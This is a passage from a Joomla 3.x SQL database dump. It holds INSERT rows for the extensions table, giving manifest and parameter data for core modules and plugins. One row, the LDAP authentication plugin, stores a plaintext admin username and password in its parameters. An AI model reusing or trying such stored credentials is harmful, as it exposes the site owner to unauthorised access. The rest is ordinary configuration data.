reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_TITLE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(312,'mod_toolbar','module','mod_toolbar','',1,1,1,1,'{\"name\":\"mod_toolbar\",\"type\":\"module\",\"creationDate\":\"Nov 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_TOOLBAR_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(313,'mod_multilangstatus','module','mod_multilangstatus','',1,1,1,0,'{\"name\":\"mod_multilangstatus\",\"type\":\"module\",\"creationDate\":\"September 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MULTILANGSTATUS_XML_DESCRIPTION\",\"group\":\"\"}','{\"cache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(314,'mod_version','module','mod_version','',1,1,1,0,'{\"legacy\":false,\"name\":\"mod_version\",\"type\":\"module\",\"creationDate\":\"January 2012\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2012 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_VERSION_XML_DESCRIPTION\",\"group\":\"\"}','{\"format\":\"short\",\"product\":\"1\",\"cache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(315,'mod_stats_admin','module','mod_stats_admin','',1,1,1,0,'{\"name\":\"mod_stats_admin\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATS_XML_DESCRIPTION\",\"group\":\"\"}','{\"serverinfo\":\"0\",\"siteinfo\":\"0\",\"counter\":\"0\",\"increase\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}','','',0,'0000-00-00 00:00:00',0,0),(316,'mod_tags_popular','module','mod_tags_popular','',0,1,1,0,'{\"name\":\"mod_tags_popular\",\"type\":\"module\",\"creationDate\":\"January 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"MOD_TAGS_POPULAR_XML_DESCRIPTION\",\"group\":\"\"}','{\"maximum\":\"5\",\"timeframe\":\"alltime\",\"owncache\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(317,'mod_tags_similar','module','mod_tags_similar','',0,1,1,0,'{\"name\":\"mod_tags_similar\",\"type\":\"module\",\"creationDate\":\"January 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"MOD_TAGS_SIMILAR_XML_DESCRIPTION\",\"group\":\"\"}','{\"maximum\":\"5\",\"matchtype\":\"any\",\"owncache\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(400,'plg_authentication_gmail','plugin','gmail','authentication',0,0,1,0,'{\"name\":\"plg_authentication_gmail\",\"type\":\"plugin\",\"creationDate\":\"February 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_GMAIL_XML_DESCRIPTION\",\"group\":\"\"}','{\"applysuffix\":\"0\",\"suffix\":\"\",\"verifypeer\":\"1\",\"user_blacklist\":\"\"}','','',0,'0000-00-00 00:00:00',1,0),(401,'plg_authentication_joomla','plugin','joomla','authentication',0,1,1,1,'{\"name\":\"plg_authentication_joomla\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_AUTH_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(402,'plg_authentication_ldap','plugin','ldap','authentication',0,0,1,0,'{\"name\":\"plg_authentication_ldap\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LDAP_XML_DESCRIPTION\",\"group\":\"\"}','{\"host\":\"\",\"port\":\"389\",\"use_ldapV3\":\"0\",\"negotiate_tls\":\"0\",\"no_referrals\":\"0\",\"auth_method\":\"bind\",\"base_dn\":\"\",\"search_string\":\"\",\"users_dn\":\"\",\"username\":\"admin\",\"password\":\"bobby7\",\"ldap_fullname\":\"fullName\",\"ldap_email\":\"mail\",\"ldap_uid\":\"uid\"}','','',0,'0000-00-00 00:00:00',3,0),(403,'plg_content_contact','plugin','contact','content',0,1,1,0,'{\"name\":\"plg_content_contact\",\"type\":\"plugin\",\"creationDate\":\"January 2014\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.2\",\"description\":\"PLG_CONTENT_CONTACT_XML_DESCRIPTION\",\"group\":\"\"}','','','',736,'2015-03-12 06:32:01',1,0),(404,'plg_content_emailcloak','plugin','emailcloak','content',0,1,1,0,'{\"name\":\"plg_content_emailcloak\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_EMAILCLOAK_XML_DESCRIPTION\",\"group\":\"\"}','{\"mode\":\"1\"}','','',0,'0000-00-00 00:00:00',1,0),(405,'plg_content_geshi','plugin','geshi','content',0,0,1,0,'{\"legacy\":false,\"name\":\"plg_content_geshi\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"qbnz.com\\/highlighter\",\"version\":\"2.5.0\",\"description\":\"PLG_CONTENT_GESHI_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(406,'plg_content_loadmodule','plugin','loadmodule','content',0,1,1,0,'{\"name\":\"plg_content_loadmodule\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LOADMODULE_XML_DESCRIPTION\",\"group\":\"\"}','{\"style\":\"none\"}','','',0,'0000-00-00 00:00:00',0,0),(407,'plg_content_pagebreak','plugin','pagebreak','content',0,1,1,0,'{\"name\":\"plg_content_pagebreak\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_PAGEBREAK_XML_DESCRIPTION\",\"group\":\"\"}','{\"title\":\"1\",\"multipage_toc\":\"1\",\"showall\":\"1\"}','','',0,'0000-00-00 00:00:00',4,0),(408,'plg_content_pagenavigation','plugin','pagenavigation','content',0,1,1,0,'{\"name\":\"plg_content_pagenavigation\",\"type\":\"plugin\",\"creationDate\":\"January 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_PAGENAVIGATION_XML_DESCRIPTION\",\"group\":\"\"}','{\"position\":\"1\"}','','',0,'0000-00-00 00:00:00',5,0),(409,'plg_content_vote','plugin','vote','content',0,1,1,0,'{\"name\":\"plg_content_vote\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_VOTE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',6,0),(410,'plg_editors_codemirror','plugin','codemirror','editors',0,1,1,1,'{\"name\":\"plg_editors_codemirror\",\"type\":\"plugin\",\"creationDate\":\"28 March 2011\",\"author\":\"Marijn Haverbeke\",\"copyright\":\"\",\"authorEmail\":\"N\\/A\",\"authorUrl\":\"\",\"version\":\"3.15\",\"description\":\"PLG_CODEMIRROR_XML_DESCRIPTION\",\"group\":\"\"}','{\"lineNumbers\":\"1\",\"lineWrapping\":\"1\",\"matchTags\":\"1\",\"matchBrackets\":\"1\",\"marker-gutter\":\"1\",\"autoCloseTags\":\"1\",\"autoCloseBrackets\":\"1\",\"autoFocus\":\"1\",\"theme\":\"default\",\"tabmode\":\"indent\"}','','',0,'0000-00-00 00:00:00',0,0),(411,'plg_editors_none','plugin','none','editors',0,1,1,1,'{\"name\":\"plg_editors_none\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Unknown\",\"copyright\":\"\",\"authorEmail\":\"N\\/A\",\"authorUrl\":\"\",\"version\":\"3.0.0\",\"description\":\"PLG_NONE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(412,'plg_editors_tinymce','plugin','tinymce','editors',0,1,1,0,'{\"name\":\"plg_editors_tinymce\",\"type\":\"plugin\",\"creationDate\":\"2005-2013\",\"author\":\"Moxiecode Systems AB\",\"copyright\":\"Moxiecode Systems AB\",\"authorEmail\":\"N\\/A\",\"authorUrl\":\"tinymce.moxiecode.com\",\"version\":\"4.0.22\",\"description\":\"PLG_TINY_XML_DESCRIPTION\",\"group\":\"\"}','{\"mode\":\"1\",\"skin\":\"0\",\"mobile\":\"0\",\"entity_encoding\":\"raw\",\"lang_mode\":\"0\",\"text_direction\":\"ltr\",\"content_css\":\"1\",\"content_css_custom\":\"\",\"relative_urls\":\"1\",\"newlines\":\"0\",\"invalid_elements\":\"script,applet\",\"extended_elements\":\"\",\"html_height\":\"550\",\"html_width\":\"750\",\"resizing\":\"1\",\"element_path\":\"1\",\"fonts\":\"1\",\"paste\":\"1\",\"searchreplace\":\"1\",\"insertdate\":\"1\",\"colors\":\"1\",\"table\":\"1\",\"smilies\":\"1\",\"hr\":\"1\",\"link\":\"1\",\"media\":\"1\",\"print\":\"1\",\"directionality\":\"1\",\"fullscreen\":\"1\",\"alignment\":\"1\",\"visualchars\":\"1\",\"visualblocks\":\"1\",\"nonbreaking\":\"1\",\"template\":\"1\",\"blockquote\":\"1\",\"wordcount\":\"1\",\"image_advtab\":\"1\",\"advlist\":\"1\",\"autosave\":\"1\",\"contextmenu\":\"1\",\"inlinepopups\":\"1\",\"custom_plugin\":\"\",\"custom_button\":\"\"}','','',736,'2015-03-12 09:44:15',3,0),(413,'plg_editors-xtd_article','plugin','article','editors-xtd',0,1,1,1,'{\"name\":\"plg_editors-xtd_article\",\"type\":\"plugin\",\"creationDate\":\"October 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_ARTICLE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',1,0),(414,'plg_editors-xtd_image','plugin','image','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_image\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_IMAGE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(415,'plg_editors-xtd_pagebreak','plugin','pagebreak','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_pagebreak\",\"type\":\"plugin\",\"creationDate\":\"August 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_EDITORSXTD_PAGEBREAK_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',3,0),(416,'plg_editors-xtd_readmore','plugin','readmore','editors-xtd',0,1,1,0,'{\"name\":\"plg_editors-xtd_readmore\",\"type\":\"plugin\",\"creationDate\":\"March 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_READMORE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',4,0),(417,'plg_search_categories','plugin','categories','search',0,1,1,0,'{\"name\":\"plg_search_categories\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(418,'plg_search_contacts','plugin','contacts','search',0,1,1,0,'{\"name\":\"plg_search_contacts\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CONTACTS_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(419,'plg_search_content','plugin','content','search',0,1,1,0,'{\"name\":\"plg_search_content\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_CONTENT_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(420,'plg_search_newsfeeds','plugin','newsfeeds','search',0,1,1,0,'{\"name\":\"plg_search_newsfeeds\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(421,'plg_search_weblinks','plugin','weblinks','search',0,1,1,0,'{\"name\":\"plg_search_weblinks\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEARCH_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\"}','{\"search_limit\":\"50\",\"search_content\":\"1\",\"search_archived\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(422,'plg_system_languagefilter','plugin','languagefilter','system',0,0,1,1,'{\"name\":\"plg_system_languagefilter\",\"type\":\"plugin\",\"creationDate\":\"July 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LANGUAGEFILTER_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',1,0),(423,'plg_system_p3p','plugin','p3p','system',0,1,1,0,'{\"name\":\"plg_system_p3p\",\"type\":\"plugin\",\"creationDate\":\"September 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_P3P_XML_DESCRIPTION\",\"group\":\"\"}','{\"headers\":\"NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM\"}','','',0,'0000-00-00 00:00:00',2,0),(424,'plg_system_cache','plugin','cache','system',0,0,1,1,'{\"name\":\"plg_system_cache\",\"type\":\"plugin\",\"creationDate\":\"February 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CACHE_XML_DESCRIPTION\",\"group\":\"\"}','{\"browsercache\":\"0\",\"cachetime\":\"15\"}','','',0,'0000-00-00 00:00:00',3,0),(425,'plg_system_debug','plugin','debug','system',0,1,1,0,'{\"name\":\"plg_system_debug\",\"type\":\"plugin\",\"creationDate\":\"December 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_DEBUG_XML_DESCRIPTION\",\"group\":\"\"}','{\"profile\":\"1\",\"queries\":\"1\",\"memory\":\"1\",\"language_files\":\"1\",\"language_strings\":\"1\",\"strip-first\":\"1\",\"strip-prefix\":\"\",\"strip-suffix\":\"\"}','','',0,'0000-00-00 00:00:00',4,0),(426,'plg_system_log','plugin','log','system',0,1,1,1,'{\"name\":\"plg_system_log\",\"type\":\"plugin\",\"creationDate\":\"April 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LOG_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',5,0),(427,'plg_system_redirect','plugin','redirect','system',0,1,1,1,'{\"name\":\"plg_system_redirect\",\"type\":\"plugin\",\"creationDate\":\"April 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_REDIRECT_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',6,0),(428,'plg_system_remember','plugin','remember','system',0,1,1,1,'{\"name\":\"plg_system_remember\",\"type\":\"plugin\",\"creationDate\":\"April 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_REMEMBER_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',7,0),(429,'plg_system_sef','plugin','sef','system',0,1,1,0,'{\"name\":\"plg_system_sef\",\"type\":\"plugin\",\"creationDate\":\"December 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SEF_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',8,0),(430,'plg_system_logout','plugin','logout','system',0,1,1,1,'{\"name\":\"plg_system_logout\",\"type\":\"plugin\",\"creationDate\":\"April 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LOGOUT_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',9,0),(431,'plg_user_contactcreator','plugin','contactcreator','user',0,0,1,0,'{\"name\":\"plg_user_contactcreator\",\"type\":\"plugin\",\"creationDate\":\"August 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTACTCREATOR_XML_DESCRIPTION\",\"group\":\"\"}','{\"autowebpage\":\"\",\"category\":\"34\",\"autopublish\":\"0\"}','','',0,'0000-00-00 00:00:00',1,0),(432,'plg_user_joomla','plugin','joomla','user',0,1,1,0,'{\"name\":\"plg_user_joomla\",\"type\":\"plugin\",\"creationDate\":\"December 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2009 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_USER_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','{\"autoregister\":\"1\"}','','',0,'0000-00-00 00:00:00',2,0),(433,'plg_user_profile','plugin','profile','user',0,0,1,0,'{\"name\":\"plg_user_profile\",\"type\":\"plugin\",\"creationDate\":\"January 2008\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_USER_PROFILE_XML_DESCRIPTION\",\"group\":\"\"}','{\"register-require_address1\":\"1\",\"register-require_address2\":\"1\",\"register-require_city\":\"1\",\"register-require_region\":\"1\",\"register-require_country\":\"1\",\"register-require_postal_code\":\"1\",\"register-require_phone\":\"1\",\"register-require_website\":\"1\",\"register-require_favoritebook\":\"1\",\"register-require_aboutme\":\"1\",\"register-require_tos\":\"1\",\"register-require_dob\":\"1\",\"profile-require_address1\":\"1\",\"profile-require_address2\":\"1\",\"profile-require_city\":\"1\",\"profile-require_region\":\"1\",\"profile-require_country\":\"1\",\"profile-require_postal_code\":\"1\",\"profile-require_phone\":\"1\",\"profile-require_website\":\"1\",\"profile-require_favoritebook\":\"1\",\"profile-require_aboutme\":\"1\",\"profile-require_tos\":\"1\",\"profile-require_dob\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(434,'plg_extension_joomla','plugin','joomla','extension',0,1,1,1,'{\"name\":\"plg_extension_joomla\",\"type\":\"plugin\",\"creationDate\":\"May 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_EXTENSION_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',736,'2015-03-12 12:40:33',1,0),(435,'plg_content_joomla','plugin','joomla','content',0,1,1,0,'{\"name\":\"plg_content_joomla\",\"type\":\"plugin\",\"creationDate\":\"November 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',736,'2015-03-12 12:40:55',0,0),(436,'plg_system_languagecode','plugin','languagecode','system',0,0,1,0,'{\"name\":\"plg_system_languagecode\",\"type\":\"plugin\",\"creationDate\":\"November 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_SYSTEM_LANGUAGECODE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',10,0),(437,'plg_quickicon_joomlaupdate','plugin','joomlaupdate','quickicon',0,1,1,1,'{\"name\":\"plg_quickicon_joomlaupdate\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_QUICKICON_JOOMLAUPDATE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(438,'plg_quickicon_extensionupdate','plugin','extensionupdate','quickicon',0,1,1,1,'{\"name\":\"plg_quickicon_extensionupdate\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_QUICKICON_EXTENSIONUPDATE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(439,'plg_captcha_recaptcha','plugin','recaptcha','captcha',0,1,1,0,'{\"name\":\"plg_captcha_recaptcha\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CAPTCHA_RECAPTCHA_XML_DESCRIPTION\",\"group\":\"\"}','{\"public_key\":\"\",\"private_key\":\"\",\"theme\":\"clean\"}','','',0,'0000-00-00 00:00:00',0,0),(440,'plg_system_highlight','plugin','highlight','system',0,1,1,0,'','{}','','',0,'0000-00-00 00:00:00',7,0),(441,'plg_content_finder','plugin','finder','content',0,1,1,0,'{\"legacy\":false,\"name\":\"plg_content_finder\",\"type\":\"plugin\",\"creationDate\":\"December 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2012 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"1.7.0\",\"description\":\"PLG_CONTENT_FINDER_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(442,'plg_finder_categories','plugin','categories','finder',0,1,1,0,'{\"name\":\"plg_finder_categories\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_FINDER_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',1,0),(443,'plg_finder_contacts','plugin','contacts','finder',0,1,1,0,'{\"name\":\"plg_finder_contacts\",\"type\":\"plugin\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights 